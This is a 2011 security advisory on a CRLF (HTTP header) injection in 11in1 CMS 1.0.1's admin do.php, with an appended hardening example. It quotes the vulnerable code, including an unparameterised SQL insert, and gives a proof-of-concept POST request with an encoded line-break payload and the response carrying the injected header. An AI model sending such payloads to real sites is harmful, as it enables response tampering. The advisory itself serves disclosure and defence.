
11in1 CMS 1.0.1 CRLF Injection

08 Nov 2011 00:00:00 | Reported by LiquidWorm | Type: packetstorm | Source: packetstormsecurity.com

11in1 CMS v1.0.1 CRLF Injection Vulnerability in do.ph

Code
`  
11in1 CMS v1.0.1 (do.php) CRLF Injection Vulnerability  
  
  
Vendor: 11in1  
Product web page: http://www.11in1.org  
Affected version: 1.0.1  
  
Summary: Eleven in One is an open-source content management  
system (CMS) that is powered by PHP and MySQL. It does not  
only help you manage your personal blog but also maintain  
your postings at social networks. By establishing consistency  
among the data transmitted from and to the blog, this CMS  
sustains continuous harmonization of your data over time.  
  
Desc: Input passed to the 'content' parameter in 'do.php' on  
line 2112 is not properly sanitised before being returned to  
the user. This can be exploited to insert arbitrary HTTP  
headers, which are included in a response sent to the user.  
  
  
==============================================================  
/admin/do.php:  
--------------------------------------------------------------  
  
2088: // update status  
2089: else if(($action == "postStatus")&&($_SERVER["REQUEST_METHOD"] == "POST")&&($_SESSION['admin'] == 1))  
2090: {  
2091: $content = htmlspecialchars($_POST['content']);  
2092:  
2093: // Get database information  
2094: $Database = new Database;  
2095: $info = $Database->getInfo();  
2096:  
2097: // connect to database  
2098: $conn = mysql_connect($info[0], $info[1], $info[2]);  
2099: mysql_select_db($info[3], $conn);  
2100:  
2101: $date = date("Y-m-d H:i:s");  
2102:  
2103: // clear table  
2104: $result = mysql_query("INSERT INTO 11in1_streamline (content, date) VALUES ('$content', '$date')");  
2105:  
2106: // close connection to db  
2107: mysql_close($conn);  
2108:  
2109: // prepare success message  
2110: $_SESSION['msg'] = array("title" => $lang_backend_request_executed, "msg" => $lang_backend_statusPosted, "url" => "streamline.php", "button" => $lang_error_goBack);  
2111:  
2112: header("Location: msg.php?connect=yes&status=$content");  
2113: }  
  
==============================================================  
  
  
Tested on: Microsoft Windows XP Professional SP3 (EN)  
Apache 2.2.21  
MySQL 5.5.16  
PHP 5.3.8  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Zero Science Lab  
  
  
  
Advisory ID: ZSL-2011-5055  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5055.php  
  
  
  
06.11.2011  
  
------  
  
  
POST /11in1/admin/do.php?action=postStatus HTTP/1.1  
Content-Length: 47  
Content-Type: application/x-www-form-urlencoded  
Cookie: PHPSESSID=s5vsgh5cu5vfs0alihug4ut2k6; phpMyAdmin=36g6t7ggq5ildo4uiff7b5n76rpl7n9m; pma_lang=be%40latin; pma_collation_connection=cp1250_czech_cs; pma_fontsize=81%25  
Host: localhost:80  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)  
  
content=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection  
  
--  
  
HTTP/1.1 302 Found  
Date: Sun, 06 Nov 2011 18:53:29 GMT  
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1  
X-Powered-By: PHP/5.3.8  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
Pragma: no-cache  
Location: msg.php?connect=yes&status=  
ZSL-Custom-Header: love_injection  
Content-Length: 1716  
Keep-Alive: timeout=5, max=97  
Connection: Keep-Alive  
Content-Type: text/html  
`
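The pattern on line 2112 of `do.php` next to a hardened form, as an added example that is not part of the advisory or of 11in1's code. The function names `location_vulnerable` and `location_hardened` are hypothetical, and the example assumes PHP 7 or later for the type declarations.

```php
<?php
// Added example; not code from 11in1. Function names are hypothetical.

// Pattern from do.php line 2112: htmlspecialchars() only rewrites HTML
// metacharacters (& < > and quotes), so CR and LF pass through unchanged
// into the header line.
function location_vulnerable(string $content): string
{
    return 'Location: msg.php?connect=yes&status=' . htmlspecialchars($content);
}

// Hardened form: rawurlencode() percent-encodes CR, LF, space, '&' and '#',
// so the value stays one query parameter on one header line.
function location_hardened(string $content): string
{
    $line = 'Location: msg.php?connect=yes&status=' . rawurlencode($content);
    // Defence in depth: refuse to emit a header containing CR, LF or NUL.
    if (preg_match('/[\r\n\0]/', $line)) {
        throw new RuntimeException('refusing header with line break');
    }
    return $line;
}

// The decoded 'content' value from the request shown in the advisory.
$payload = urldecode('%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection');

$bad  = location_vulnerable($payload);
$good = location_hardened($payload);

// Count the lines each header string would occupy in a response.
printf("vulnerable: %d line(s)\n", count(preg_split('/\r\n|\r|\n/', $bad)));
printf("hardened:   %d line(s)\n", count(preg_split('/\r\n|\r|\n/', $good)));
echo $good, "\n";

// In the handler itself the call would become:
//   header(location_hardened($_POST['content']));
//   exit;
```

Because the hardened form passes the raw value through URL encoding instead of `htmlspecialchars()`, whatever page reads the `status` parameter has to HTML-escape it at output time.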
